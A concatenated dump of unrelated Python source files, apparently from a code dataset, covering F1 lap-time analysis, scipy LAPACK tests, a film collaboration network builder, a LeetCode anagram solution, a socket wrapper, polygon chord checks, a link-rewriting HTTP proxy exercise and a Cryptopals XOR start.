    avg_laps.columns = ['NO', 'TIRE', 'TRACK', 'YEAR', 'COUNT', 'TIME']
    return avg_laps
def assign_safety(track, year, lap):
    """Return 1 if `lap` of (track, year) was run under the safety car,
    0 otherwise.

    The table below lists safety-car lap sets per track and year,
    transcribed from race records.

    NOTE(review): a known track with a year missing from its inner dict
    (e.g. ('hungary', 2016)) raises KeyError rather than returning 0 —
    confirm whether callers only pass listed seasons.
    """
    safety_car = {'australia': {2015: {1,2,3},
                                2016: {17}},
                  'china': {2015: {54,55,56},
                            2016: {4,5,6,7,8}},
                  'hungary': {2015: {43,44,45,46,47,48}},
                  'belgium': {2015: {20,21}},
                  'singapore': {2015: {13,14,15,16,17,18,37,38,39,40}},
                  'russia': {2015: {1,2,3,12,13,14,15,16}},
                  'usa': {2015: {5,6,7,27,28,29,30,31,32,37,38,39,43,44,45,46}},
                  'mexico': {2015: {52,53,54,55,56,57}},
                  'malaysia': {2015: {4,5,6}},
                  'monaco': {2015: {63,64,65,66,67,68,69,70}},
                  'austria': {2015: {1,2,3,4,5,6}},
                  'britain': {2015: {1,2,3,33,34}},
                  }
    if track in safety_car:
        if lap in safety_car[track][year]:
            return 1
        else:
            return 0
    else:
        return 0
def get_stints(df):
    """Split each driver's laps into stints delimited by 'PIT' rows.

    Returns a defaultdict mapping driver NO -> list of
    (laps, times, tires) tuples, one per completed stint.

    Fixes a NameError in the original, which initialised `tires` but
    appended to an undefined `tire` list. Behaviour otherwise kept:
    the pit-in row and the out-lap after it are excluded from stints,
    and the final stint after the last stop is never flushed.
    """
    previous = None
    laps, times, tires = [], [], []
    stints = defaultdict(list)
    for _, row in df.iterrows():
        if row['GAP'] == 'PIT':
            stints[row['NO']].append((laps, times, tires))
            laps, times, tires = [], [], []
        elif previous == 'PIT':
            pass  # skip the out-lap following a pit stop
        else:
            laps.append(row['LAP'])
            times.append(row['TIME'])
            tires.append(row['TIRE'])
        previous = row['GAP']
    return stints
def load_tracks(features=True):
    """Load track metadata from disk.

    With features=True reads the track-features CSV; otherwise reads the
    track-history CSV and drops its LAPS column. Track names are
    lower-cased either way.
    """
    if features:
        tracks = pd.read_csv('data/track_features.csv')
    else:
        tracks = pd.read_csv('data/track_history.csv')
        tracks.drop('LAPS', axis=1, inplace=True)
    tracks['TRACK'] = tracks['TRACK'].apply(lambda x: x.lower())
    return tracks
def load_drivers():
    """Return the driver roster (NAME / DRIVER / NO) read from disk."""
    return pd.read_csv('data/drivers.csv')
def create_race_features(filename):
    """Build the per-lap feature frame for one race.

    `filename` has the form '<year>_<race_num>_<track>' and selects the
    lap-history and tire-strategy CSVs on disk. Returns lap times joined
    with per-lap tire compounds plus TRACK/YEAR/RACE columns.

    Fix: the path templates had lost their '{filename}' placeholders
    (making the trailing .format(filename=...) a no-op), so the files
    could never be found; the placeholders are restored.
    """
    year, race_num, track = filename.split('_')
    # Load lap times for all drivers
    lap_data = pd.read_csv('data/lap_history/{filename}_lap_history.csv'.format(filename=filename), header=None)
    lap_times = assign_lap(lap_data)
    lap_times['TIME'] = convert_time(lap_times['TIME'])
    lap_times.sort_values(by=['NO', 'LAP'], inplace=True)
    lap_times['LAP'] = lap_times['LAP'].astype(int)

    # Load Tire strategy data
    tire_data = pd.read_csv('data/tire_strategy/{filename}.csv'.format(filename=filename))
    tire_strat = get_tires(tire_data)

    # Load Driver list
    driver_list = load_drivers()

    # Join Driver, Name, No. to tire data and sort by No.
    tire_strat = pd.merge(driver_list, tire_strat, on='NAME')
    tire_strat.drop(['NAME', 'DRIVER'], axis=1, inplace=True)

    # Append tire data to lap data: flatten the non-null per-lap tire
    # cells into one column aligned with the sorted lap rows.
    mask = tire_strat.iloc[:,1:].notnull().values
    lap_times['TIRE'] = tire_strat[tire_strat.columns[1:]].values[mask].flatten()
    lap_times['TRACK'] = track
    lap_times['YEAR'] = int(year)
    lap_times['RACE'] = race_num
    lap_times['GAP'] = lap_times['GAP'].apply(lambda x: x.strip())
    return lap_times
def assign_stint_lap(df):
    """Number laps within each stint (1-based); 'PIT' rows close a stint.

    The pit-in row itself receives the stint's final number; counting
    restarts on the following row. Modifies `df` in place and returns it.
    Assumes a default (monotonic integer) index, as the original did.

    Fix: the original used `.ix`, which was removed in pandas 1.0;
    label-based `.loc` slicing is the equivalent (both ends inclusive),
    and assigning through `df.loc[...]` avoids chained assignment.
    """
    df['STINT_LAP'] = 1
    pit_rows = df[df['GAP'] == 'PIT'].index
    start = 0
    for stop in pit_rows:
        df.loc[start:stop, 'STINT_LAP'] = df.loc[start:stop, 'STINT_LAP'].cumsum()
        start = stop + 1
    end = df.index[-1]
    df.loc[start:end, 'STINT_LAP'] = df.loc[start:end, 'STINT_LAP'].cumsum()
    return df
def remove_pits(df):
    """Drop every 'PIT' row and the row immediately after it (out-lap)."""
    drop_labels = []
    prev_gap = None
    for label, row in df.iterrows():
        if row['GAP'] == 'PIT' or prev_gap == 'PIT':
            drop_labels.append(label)
        prev_gap = row['GAP']
    return df.drop(drop_labels, axis=0)
def plot_drivers(df, race):
    """Show one lap-time scatter plot per driver for the given race.

    *race* has the form '<year>_<race_num>_<track>'.  Points are coloured by
    tire compound via the external `assign_color` helper.
    NOTE(review): `sn` is presumably seaborn and `assign_color` is defined
    elsewhere in this file -- confirm both are in scope at call time.
    Blocks on plt.show() for each figure.
    """
    sn.set_style(style='whitegrid')
    year, race_num, track = race.split('_')
    # Restrict to the requested track/year combination.
    this_race = df[(df['TRACK'] == track) & (df['YEAR'] == int(year))]
    for num in this_race['NO'].unique():
        driver_idx = this_race['NO'] == num
        plt.figure(figsize=(12,6))
        plt.title('{} {} - Driver No. {}'.format(track.upper(), year, num))
        plt.xlim([0, this_race['LAP'].max() + 1])
        plt.scatter(this_race['LAP'][driver_idx], this_race['TIME'][driver_idx], c=this_race['TIRE'][driver_idx].apply(assign_color), alpha=1)
        plt.show()
def plot_race(df, race):
    """Show a single lap-time scatter plot for all drivers in one race.

    Same filtering and tire colouring as plot_drivers, but one combined
    figure with半-transparent points instead of one figure per driver.
    NOTE(review): relies on the external `assign_color` helper.
    """
    year, race_num, track = race.split('_')
    this_race = df[(df['TRACK'] == track) & (df['YEAR'] == int(year))]
    plt.figure(figsize=(12,6))
    plt.title('{} {}'.format(track.upper(), year))
    plt.xlim([0, this_race['LAP'].max() + 1])
    plt.scatter(this_race['LAP'], this_race['TIME'], c=this_race['TIRE'].apply(assign_color), alpha=.5)
    plt.show()
| true |
8d3e66f452c1789ffa2c4b52a0e530d94f8cb979 | Python | bioCKO/lpp_Script | /pacbiolib/thirdparty/pythonpkgs/scipy/scipy_0.9.0+pbi86/lib/python2.7/site-packages/scipy/linalg/tests/test_lapack.py | UTF-8 | 1,563 | 2.546875 | 3 | [
"BSD-2-Clause"
] | permissive | #! python
#
# Created by: Pearu Peterson, September 2002
#
from numpy.testing import TestCase, run_module_suite, assert_equal, \
assert_array_almost_equal, assert_
from numpy import ones
from scipy.linalg import flapack, clapack
class TestFlapackSimple(TestCase):
    """Smoke tests for a couple of flapack routines (balance, Hessenberg)."""

    def test_gebal(self):
        """?gebal should leave an already-balanced matrix unchanged."""
        a = [[1,2,3],[4,5,6],[7,8,9]]
        a1 = [[1,0,0,3e-4],
              [4,0,0,2e-3],
              [7,1,0,0],
              [0,1,0,0]]
        for p in 'sdzc':
            f = getattr(flapack,p+'gebal',None)
            if f is None: continue
            ba,lo,hi,pivscale,info = f(a)
            # repr() replaces the Python-2-only backtick syntax (`info`),
            # which is a SyntaxError on Python 3; repr() works on both.
            assert_(not info, repr(info))
            assert_array_almost_equal(ba,a)
            assert_equal((lo,hi),(0,len(a[0])-1))
            assert_array_almost_equal(pivscale,ones(len(a)))

            ba,lo,hi,pivscale,info = f(a1,permute=1,scale=1)
            assert_(not info, repr(info))
            #print a1
            #print ba,lo,hi,pivscale

    def test_gehrd(self):
        """?gehrd: Hessenberg reduction should succeed on a small matrix."""
        a = [[-149, -50,-154],
             [ 537, 180, 546],
             [ -27, -9, -25]]
        for p in 'd':
            f = getattr(flapack,p+'gehrd',None)
            if f is None: continue
            ht,tau,info = f(a)
            assert_(not info, repr(info))
class TestLapack(TestCase):
    """Smoke checks that the LAPACK wrapper modules were built at all."""

    def test_flapack(self):
        """No-op when the Fortran LAPACK wrapper is an empty module."""
        if hasattr(flapack, 'empty_module'):
            # flapack module is empty
            pass

    def test_clapack(self):
        """No-op when the C LAPACK wrapper is an empty module."""
        if hasattr(clapack, 'empty_module'):
            # clapack module is empty
            pass
if __name__ == "__main__":
    # Run this module's test suite when executed directly.
    run_module_suite()
| true |
eae91c78ac57a6c3bd09d64e39b2ab0bdda0fe3e | Python | AlexTK2012/HKU-7507-Visual-Analysis | /python/process_data_human.py | UTF-8 | 10,785 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
movies表字段:
budget,genres,homepage,id,keywords,original_language,original_title,overview,popularity,production_companies,production_countries,release_date,revenue,runtime,spoken_languages,status,tagline,title,vote_average,vote_count
credits表字段:
movie_id,title,cast,crew
Goal: 只取top100 电影里每部的前两个演员+前两个导演,计算
Result:
"""
import json
import pandas as pd
import numpy as np
# 加载movies 表, 电影基本属性数据
def load_tmdb_movies(path):
    """Load the TMDB movies table from *path* as-is (no column decoding)."""
    return pd.read_csv(path)
# 加载credits 表, 电影-演员-导演数据
def load_tmdb_credits(path):
    """Load the TMDB credits table and JSON-decode the cast/crew columns.

    The 'cast' and 'crew' columns are stored as JSON text in the CSV; they
    come back as Python lists of dicts.
    """
    frame = pd.read_csv(path)
    for json_column in ('cast', 'crew'):
        frame[json_column] = frame[json_column].apply(json.loads)
    return frame
# 写文件
def write_data(path, data):
    """Serialize *data* as JSON to the file at *path* (overwriting it)."""
    with open(path, 'w') as out_file:
        out_file.write(json.dumps(data))
# 去重 list中元素为字典的且字典部分key相同的list元素
def remove_duplicate(dict_list):
    """De-duplicate a list of person dicts by their 'id' key.

    Only 'id' is considered (a person may appear with several roles);
    the first occurrence of each id wins and relative order is preserved.
    """
    seen_ids = set()
    unique_entries = []
    for entry in dict_list:
        if entry['id'] not in seen_ids:
            seen_ids.add(entry['id'])
            unique_entries.append(entry)
    return unique_entries
# 计算主演 + 主导演数据
# top100数据:
# 导演数!=1 的电影数量 : 13
# 去重前, 演员+导演 总计人数: 313
# 去重前, 导演数量 : 113
# 去重后, 演员+导演 总计人数: 209
# 去重后, 导演数量 : 69
# Return: 所有参与者(演员+导演)数据, 格式:{id,name,job,gender}
def compute_main_human_data(dataframe):
    """Collect the leading participants of every movie in *dataframe*.

    Takes the first two billed actors plus up to the first two directors of
    each movie, then de-duplicates by person id.  Returns a list of dicts
    of the form {id, name, job, gender} with job 'Actor' or 'Director'.
    Prints (Chinese) diagnostics about counts before/after de-duplication.
    """
    data = []
    count = 0
    # Scan row by row: movie_id, title, cast, crew
    for index, row in dataframe.iterrows():
        # Keep only the first two billed actors
        for cast in row.cast[0:2]:
            item = {'id': cast['id'], 'name': cast['name'],
                    'job': 'Actor', 'gender': cast['gender']}
            data.append(item)
            # if item['id'] == 1269:
            #     print(item)
        # Walk the crew entries: credit_id, department, gender, id, job, name
        director_number = 0
        for crew in row.crew:
            if crew['job'] == 'Director':
                item = {'id': crew['id'], 'name': crew['name'],
                        'job': 'Director', 'gender': crew['gender']}
                data.append(item)
                # Kevin Costner is both lead actor and lead director; the
                # de-duplication step drops his duplicate director entry.
                # if item['id'] == 1269:
                #     print(item)
                director_number += 1
                if(director_number == 2):
                    # Only the first two directors are kept.
                    # print("主导演数量大于1的电影 : ", index)
                    break
        # A movie with more than one (or no) director: the data really does
        # contain quite a few odd rows like this.
        if director_number != 1:
            # print("movie id:", row.movie_id, " ,title:",
            #       row.title_y, " ,director_num:", director_number)
            count += 1
    print("主要导演数!=1 的电影数量 :", count)
    print("去重前, 主要演员+导演 总计人数: ", len(data))
    print("去重前, 主要导演数量 :", len(list(x for x in data if x['job'] == 'Director')))
    # De-duplicate the collected people by id
    data = remove_duplicate(data)
    # Still a lot of people; further filtering may be needed.
    print("去重后, 主要演员+导演 总计人数: ", len(data))
    # Python generator expression inside len(list(...))
    print("去重后, 主要导演数量 :", len(list(x for x in data if x['job'] == 'Director')))
    # Equivalent to:
    # print("Director num:",len(list(filter(lambda x: x['job'] == 'Director', data))))
    return data
# dataframe: top100电影list(含演员+导演字段)
# nodes: 主要演员+导演的list,格式:{id,name,job,gender}
#
# 构建N*N 的二维数组 node_matrix,N=len(human_data),
# 对 x!=y, node_matrix[x,y] = x和y 两人共事过的电影数
# Goal:计算矩阵
def compute_matrix(dataframe, nodes):
    """Build an ECharts force-graph description of who worked with whom.

    *dataframe* is the top-100 movie table (with parsed cast/crew columns);
    *nodes* is the de-duplicated list of {id, name, job, gender} people.
    For every movie, its lead actors/directors that appear in *nodes* are
    pairwise connected; edge width encodes the number of shared movies and
    node size encodes the number of distinct collaborators.

    NOTE: mutates the dicts in *nodes* in place (drops 'id', adds
    'symbolSize' and 'category').  Returns the ECharts JSON dict.
    """
    # edge_matrix[x][y] = number of movies x and y worked on together
    # (fix: dtype np.int was removed in NumPy >= 1.24; plain int is the
    # equivalent platform integer dtype).
    edge_matrix = np.zeros((len(nodes), len(nodes)), dtype=int)
    # node_matrix[x] = number of distinct people x has worked with.
    node_matrix = np.zeros(len(nodes), dtype=int)
    # Scan row by row: movie_id, title, cast, crew
    for index, row in dataframe.iterrows():
        # data holds the indices (into nodes) of this movie's lead people.
        data = []
        # Walk the cast entries: cast_id, character, credit_id, gender, id, name, order
        for cast in row.cast[0:2]:
            item = {'id': cast['id'], 'name': cast['name'],
                    'job': 'Actor', 'gender': cast['gender']}
            try:
                tmp = nodes.index(item)
                if (tmp not in data):
                    data.append(tmp)
            except ValueError:
                # Not found: the person may be stored in nodes as a
                # Director while appearing here as an Actor; ignore.
                tmp = -1
        # Walk the crew entries: credit_id, department, gender, id, job, name
        director_number = 0
        for crew in row.crew:
            if crew['job'] == 'Director':
                item = {'id': crew['id'], 'name': crew['name'],
                        'job': 'Director', 'gender': crew['gender']}
                try:
                    # Only the movie's first two directors are considered.
                    tmp = nodes.index(item)
                    if (tmp not in data):
                        data.append(tmp)
                except ValueError:
                    # Ignore people who are both lead director and lead actor.
                    tmp = -1
                director_number += 1
                if(director_number == 2):
                    break
        # Connect every pair of this movie's lead people.
        for x in data:
            for y in data:
                if x != y:
                    # x worked with y one more time.
                    edge_matrix[x][y] += 1
    # Count, for each person, how many distinct collaborators they have.
    for i in range(len(nodes)):
        for tmp in edge_matrix[i]:
            if tmp > 0:
                node_matrix[i] += 1
    # edge_matrix is the adjacency matrix of collaboration counts.
    print(all_np(edge_matrix))
    # Zero the lower triangle so each undirected edge is stored only once.
    for i in range(len(nodes)):
        for j in range(0, i):
            edge_matrix[i][j] = 0
    dict_num = all_np(edge_matrix)
    for tmp in dict_num:
        print("任意两人共事 ", tmp, " 次的情况发生次数 ", dict_num[tmp])
    Edges = []
    # Walk the upper triangle and emit the ECharts node/edge records.
    for i in range(len(nodes)):
        # ECharts nodes must not carry the raw id field.
        nodes[i].pop("id", None)
        if node_matrix[i] == 0:
            print("存在无共事的人,确实不可能")
        # Node size: bigger means more distinct collaborators.
        nodes[i]["symbolSize"] = int(4 + node_matrix[i]*2)
        for j in range(i+1, len(nodes)):
            value = edge_matrix[i][j]
            # Keep only pairs that actually worked together.
            if value > 0:
                # Edge width: wider means more shared movies.
                Edges.append(
                    {'source': nodes[i]['name'], 'target': nodes[j]['name'],
                     'lineStyle': {'width':int(value)*2}})
                if nodes[i]['job'] == 'Actor':
                    nodes[i]["category"] = 0
                else:
                    nodes[i]["category"] = 1
                if nodes[j]['job'] == 'Actor':
                    nodes[j]["category"] = 0
                else:
                    nodes[j]["category"] = 1
    print("只取共事次数大于0的数据, 共有 ", len(nodes), " 人, 导演有", len(
        list(x for x in nodes if x['job'] == 'Director')), " 人, 共有 ", len(Edges), " 边")
    # ECharts additionally needs the category legend and layout type.
    categories = [{
        "name": "Actor",
        "keyword": {}
    }, {
        "name": "Director",
        "keyword": {}
    }
    ]
    network_json = {'nodes': nodes, 'links': Edges,
                    "type": "force", "categories": categories}
    return network_json
# Numpy花式索引,获取所有元素的出现次数
def all_np(arr):
    """Return {value: count} for every distinct element of *arr*.

    Uses a single np.unique pass with return_counts instead of re-scanning
    the whole array once per distinct value (the original was O(k*n)).
    Multi-dimensional input is flattened, matching the old masking logic.
    """
    arr = np.array(arr)
    values, counts = np.unique(arr, return_counts=True)
    # Cast counts to plain ints, matching the .size counts returned before.
    return {value: int(count) for value, count in zip(values, counts)}
# Load the movie / actor / director data
# credits = load_tmdb_credits("./data/tmdb_5000_credits.csv")
# Top-100 movies only
credits = load_tmdb_credits("./data/tmdb_top100_data.csv")
# Participants (actors + directors) data
main_human_data = compute_main_human_data(credits)
# write_data("./data/human_data.json", human_data)
# Compute and save the node/edge network data
network_json_data = compute_matrix(credits, main_human_data)
write_data("./tmp/network_echart_main_actor.json", network_json_data)
# write_data("./tmp/network_d3_main_actor.json", network_json_data)
| true |
a9ce2df5e3ba5fef5b7d1ea6205b45e881608e08 | Python | jingwanha/algorithm-problems | /leetcode/49_medium(1).py | UTF-8 | 888 | 3.828125 | 4 | [] | no_license | # https://leetcode.com/problems/group-anagrams/
from typing import List
class Solution:
    # O(n * k log k) grouping: sorting a word yields a canonical key shared
    # by all of its anagrams.  This replaces the original quadratic pairwise
    # comparison, which (as its own comment noted) exceeded the time limit.
    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
        """Group the words in *strs* into lists of mutual anagrams."""
        groups = {}
        for word in strs:
            groups.setdefault(''.join(sorted(word)), []).append(word)
        return list(groups.values())
if __name__=='__main__':
    # Quick demo: group the LeetCode sample input and print the result.
    strs = ["eat","tea","tan","ate","nat","bat"]
    sol = Solution()
    print(sol.groupAnagrams(strs))
a8dce830a2a379b7d5a52d91e149cf2700851644 | Python | jupmorenor/201520-redes1-Protocolo | /src/nucleo/transmisor.py | UTF-8 | 1,100 | 3.0625 | 3 | [] | no_license | # -*- coding:utf-8 -*-
'''
Created on 22/11/2015
@author: Juan Pablo Moreno - 20111020059
'''
import socket
class Transmisor(object):
    '''
    Wraps a TCP socket to provide connection, transmission and reception
    of messages (originally documented in Spanish: "Clase que implementa la
    conexion, transmision y recepcion de mensajes mediante la encapsulacion
    de un socket").

    `_conector` is the listening/client socket; `_socket` is the accepted
    peer connection when acting as a server (None in client mode).
    '''
    def __init__(self):
        self._conector = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._socket = None
        self._dir = ""
        self.tamMensaje = 0
    def crear_servidor(self, port):
        # Bind to this host's name on *port* and start listening; returns
        # the hostname so the peer can be told where to connect.
        nombre = socket.gethostname()
        self._conector.bind((nombre, port))
        self._conector.listen(5)
        return nombre
    def conectar_servidor(self):
        # Block until a client connects; store the peer socket and address.
        self._socket, self._dir = self._conector.accept()
        return True
    def conectar_cliente(self, host):
        # *host* is a (hostname, port) tuple as produced by crear_servidor.
        self._conector.connect(host)
    def enviar(self, mensaje):
        # Send over the accepted connection when in server mode, otherwise
        # over the client socket.
        if self._socket is None:
            self._conector.send(mensaje)
        else:
            self._socket.send(mensaje)
    def recibir(self):
        # NOTE(review): on Python 3 socket.recv returns bytes, so the
        # client-mode branch `"" += recv(...)` raises TypeError; the two
        # branches also return different types (str vs bytes). Verify the
        # intended Python version / decode strategy.
        mensaje = ""
        if self._socket is None:
            mensaje += self._conector.recv(64)
        else:
            mensaje = self._socket.recv(64)
        return mensaje
    def terminar(self):
        # NOTE(review): only the listening/client socket is closed; an
        # accepted peer socket (_socket) is left open.
        self._conector.close()
| true |
b9c0444dfc35cf6aae45a076fd7bbbffe08aacd5 | Python | Sebibebi67/Project_Advanced_Algo | /code/validercorde.py | UTF-8 | 715 | 3 | 3 | [] | no_license | from lib import *
# Sample polygon: eight vertices listed counter-clockwise (an octagon).
s = [Point(-9,3), Point(-2,5), Point(0,4), Point(1,1), Point(-1,-2), Point(-4,-4), Point(-9,-1), Point(-10,1)]
#Hexagone 0,7
#c = [(2,6)]
def exist(c, i, j):
    """Return True when the chord (i, j) is already in *c*, in either orientation."""
    chord, reversed_chord = (i, j), (j, i)
    return chord in c or reversed_chord in c
def intersectionCorde(a, b, c, d):
    """Return True when chords (a, b) and (c, d) strictly interleave.

    Two chords of a convex polygon cross iff exactly one endpoint of one
    chord lies strictly between the endpoints of the other.
    """
    lo1, hi1 = min(a, b), max(a, b)
    lo2, hi2 = min(c, d), max(c, d)
    crosses_forward = lo1 < lo2 < hi1 < hi2
    crosses_backward = lo2 < lo1 < hi2 < hi1
    return crosses_forward or crosses_backward
def coupe(c, i, j):
    """Return True when the chord (i, j) crosses any chord already in *c*."""
    return any(intersectionCorde(i, j, a, b) for (a, b) in c)
def validerCorde(c, l, i, j):
    """Return True when chord (i, j) may legally be added to chord set *c*.

    Endpoints that coincide or are neighbours on the l-gon (including the
    wrap-around edge between vertex 0 and vertex l-1) are rejected, as are
    chords that already exist or that cross an existing chord.
    """
    adjacent = (i - 1 <= j <= i + 1) or (j == l - 1 and i == 0) or (i == l - 1 and j == 0)
    if adjacent:
        return False
    return not exist(c, i, j) and not coupe(c, i, j)
#print(validerCorde(2,3)) | true |
1290d62b7079c92d1e3e3aabf508de6a59a24757 | Python | boogiefromzk/python_proxy | /proxy.py | UTF-8 | 8,258 | 2.703125 | 3 | [] | no_license | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Proxy server for Ivelum test:
https://github.com/ivelum/job/blob/master/code_challenges/python.md
Bugaevsky T., 2017, zk.boogie@gmail.com
"""
import http.server
import urllib.request
import urllib.parse
import urllib.error
import html
import io
import shutil
import re
import html.parser
import http.client
import socketserver
__version__ = "0.1"
class UserHTMLParser(html.parser.HTMLParser):
    """HTML parser for ContentHandler class.

    Rewrites every link-carrying attribute so navigation stays inside the
    proxy, and applies a user-defined regular-expression replacement to the
    text content of non-script/style tags.  The rewritten document is
    accumulated in self.data and retrieved with get_data().
    """
    # Class-level defaults; __init__ replaces them per instance.
    pattern = r''
    replacement = ''
    cur_tag = ''
    data = []
    server_base_url = ''
    target_base_url = ''

    def __init__(self, pattern=r'', replacement='', server_base_url='', target_base_url=''):
        self.server_base_url = server_base_url
        self.target_base_url = target_base_url
        self.pattern = pattern
        self.replacement = replacement
        # Fresh per-instance buffer (shadows the shared class attribute).
        self.data = []
        html.parser.HTMLParser.__init__(self)

    def handle_starttag(self, tag, attributes):
        # Saving the last tag to know which tag content is processed in handle_data.
        tag = tag.lower()
        self.cur_tag = tag

        # Processing URL replacements in tag attributes.
        self.data.append('<' + tag)
        for name, value in attributes:
            name = name.lower()
            if value is not None:
                # Processing attributes that might contain URL.
                if (tag == 'a' and name == 'href') \
                        or (tag == 'img' and name == 'src') \
                        or (tag == 'link' and name == 'href') \
                        or (tag == 'iframe' and name == 'src') \
                        or (tag == 'script' and name == 'src'):
                    # Checking the domain of the URL.
                    reg_exp = re.compile(r'^([a-z]+://[^/]*)[/?](.*)?$', re.I)
                    url_base_url = reg_exp.sub('\g<1>', value)
                    if url_base_url == value:
                        # No scheme://host prefix matched.
                        if value.startswith('//'):
                            # URLs without protocol should have one when getting content.
                            value = 'http:' + value
                            url_base_url = 'http:' + url_base_url
                        else:
                            # URLs without domain are for resources on the target domain.
                            value = self.target_base_url + value
                            url_base_url = self.target_base_url
                    if url_base_url == self.target_base_url:
                        # URLs on the target domain are processed as URLs on the server domain.
                        value = reg_exp.sub(self.server_base_url + '/\g<2>', value)
                    else:
                        # URLs on other domains are passed entire the URL in the url query parameter.
                        value = self.server_base_url + '/?url=' + urllib.parse.quote_plus(value)
                self.data.append(' ' + name + '="' + html.escape(value) + '"')
            else:
                # Boolean attribute (no value): emit the bare name.
                self.data.append(' ' + name)
        self.data.append('>')

    def handle_endtag(self, tag):
        # Void elements have no closing tag in the output.
        single_tags = ['img', 'meta', 'link', 'input', 'br', 'hr']
        if tag not in single_tags:
            self.data.append('</' + tag + '>')

    def handle_data(self, data):
        # Only visible text is rewritten; script/style bodies pass through.
        skip_tags = ['script', 'style']
        if self.cur_tag not in skip_tags:
            reg_exp = re.compile(self.pattern, re.I)
            data = reg_exp.sub(self.replacement, data)
            self.data.append(html.escape(data))
        else:
            self.data.append(data)

    def get_data(self):
        """Return the rewritten document accumulated so far."""
        return ''.join(self.data)
class ContentHandler(http.server.BaseHTTPRequestHandler):
    """Handles request from the server.

    Fetches the corresponding resource from the target site (or, via the
    `?url=` query parameter, from any other domain), runs HTML responses
    through UserHTMLParser, and streams the result back to the client.
    """
    target_base_url = ''
    server_base_url = ''
    server_address = ('', 0)
    pattern = r''
    replacement = ''

    def __init__(self, target_base_url, server_address, pattern, replacement, request, client_address, server):
        self.target_base_url = target_base_url
        self.server_base_url = 'http://%s:%d' % server_address
        self.server_address = server_address
        self.pattern = pattern
        self.replacement = replacement
        try:
            # The base-class constructor actually handles the request.
            http.server.BaseHTTPRequestHandler.__init__(self, request, client_address, server)
        except ConnectionError as e:
            pass # Possible connection reset error (client connection closed)

    def do_GET(self):
        """Serve a GET request."""
        source = self.open_url(self.target_base_url + self.path)
        if source:
            try:
                shutil.copyfileobj(source, self.wfile)
            except IOError as e:
                pass # Possible broken pipe (client connection closed)
            finally:
                source.close()

    def open_url(self, url):
        """Downloads the file content by the URL.

        The data is also processed according to the class designation:
        HTML bodies are rewritten through UserHTMLParser; other content
        types are forwarded unchanged.  Also sends the response status
        and headers; returns a BytesIO positioned at the start of the body.
        """
        # Restoring URLs from other domains (the /?url=... form).
        reg_exp = re.compile(r'^.*url=(.*?)$', re.I)
        if reg_exp.match(url):
            url = urllib.parse.unquote_plus(reg_exp.sub('\g<1>', url))
        # Reading URL content and encoding
        content_received = False
        url_content = None
        # Defaults used when the upstream fetch fails or omits headers.
        full_content_type = 'text/html; charset=utf-8'
        content_type = 'text/html'
        encoding = 'utf-8'
        url_timeout = 3.0
        try:
            url_content = urllib.request.urlopen(url, None, url_timeout)
            content_received = True
        except urllib.error.URLError as e:
            pass # Unable to get response for the URL, details: print(e.reason)
        if content_received:
            # Split "type/subtype; charset=..." into media type and charset.
            full_content_type = url_content.getheader('Content-type', full_content_type)
            reg_exp = re.compile(r'^(.*?);\s*charset=(.*?)$', re.I)
            content_type = reg_exp.sub('\g<1>', full_content_type)
            if content_type != full_content_type:
                encoding = reg_exp.sub('\g<2>', full_content_type)
        data = b''
        if url_content is not None:
            # Processing content
            data = url_content.read()
            if content_type == 'text/html':
                # Rewrite links/text, keeping the declared encoding.
                parser = UserHTMLParser(self.pattern, self.replacement, self.server_base_url, self.target_base_url)
                parser.feed(data.decode(encoding))
                data = parser.get_data().encode(encoding)
        # Generating output
        f = io.BytesIO()
        f.write(data)
        f.seek(0)
        if content_received:
            self.send_response(200)
        else:
            self.send_response(404)
        self.send_header("Content-type", full_content_type)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        return f

    def address_string(self):
        """Reverse DNS bugfix: skip the slow getfqdn lookup per request.
        https://stackoverflow.com/questions/2617615/slow-python-http-server-on-localhost
        """
        host, port = self.server_address[:2]
        # return socket.getfqdn(host)
        return host
class ThreadedHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    """ HTTP server that handles each request in its own thread.

    Mixing ThreadingMixIn into HTTPServer keeps a slow client from blocking
    everyone else.  No further content needed, don't touch this.
    https://stackoverflow.com/questions/8403857/python-basehttpserver-not-serving-requests-properly
    """
def run(ip='127.0.0.1', port=80, target_base_url='https://ya.ru', pattern=r'', replacement=''):
    """Start the proxy server on (ip, port), targeting *target_base_url*.

    *pattern*/*replacement* define the regex substitution applied to the
    text content of proxied HTML pages.  Blocks until Ctrl+C.
    """
    server_address = (ip, port)

    # Adding arguments to the handler: BaseHTTPRequestHandler is
    # instantiated by the server, so close over our extra parameters.
    def handler(*args):
        ContentHandler(target_base_url, server_address, pattern, replacement, *args)

    httpd = None
    try:
        httpd = ThreadedHTTPServer(server_address, handler)
        # bug fix: this message used to be printed *after* serve_forever(),
        # so it never appeared while the server was running.
        print('Ctrl + C to stop the proxy server.')
        httpd.serve_forever()
    except KeyboardInterrupt:
        print('Shutting down the proxy server.')
        # bug fix: guard against the constructor having failed (httpd None).
        if httpd is not None:
            httpd.socket.close()
# Start the proxy on localhost:8232, mirroring habrahabr.ru and appending
# a trademark sign to every standalone six-letter (Latin/Cyrillic) word.
run('127.0.0.1',
    8232,
    'https://habrahabr.ru',
    r'(?<![a-zа-я])([a-zа-я]{6})(?![a-zа-я])', # Case insensitive
    '\g<1>™')
| true |
0eb619b301248a534ae751fc025c304ced4e57ed | Python | windard/ModernCryptography | /cryptopals/quiz2.py | UTF-8 | 948 | 3.390625 | 3 | [] | no_license | # coding=utf-8
def hex2num(strings1, strings2):
    """XOR two equal-length hex strings byte by byte; return a hex string.

    bug fix: the original used hex(...)[2:], which drops the leading zero
    of any XORed byte below 0x10; '%02x' keeps every byte two digits wide
    (and works on both Python 2 and 3, unlike xrange).
    """
    text = ""
    for x in range(0, len(strings1), 2):
        text += "%02x" % (int(strings1[x:x + 2], 16) ^ int(strings2[x:x + 2], 16))
    return text
def hex2num(strings1, strings2):
    """One-line variant of the byte-wise hex XOR (shadows the loop version).

    bug fix: '%02x' instead of hex(...)[2:], which dropped the leading zero
    of any XORed byte below 0x10; range replaces the Python-2-only xrange.
    """
    return "".join("%02x" % (int(strings1[x:x + 2], 16) ^ int(strings2[x:x + 2], 16)) for x in range(0, len(strings1), 2))
# Cryptopals set 1, challenge 2: fixed XOR of two hex strings.
# Expected output: 746865206b696420646f6e277420706c6179 ("the kid don't play").
strings1 = "1c0111001f010100061a024b53535009181c"
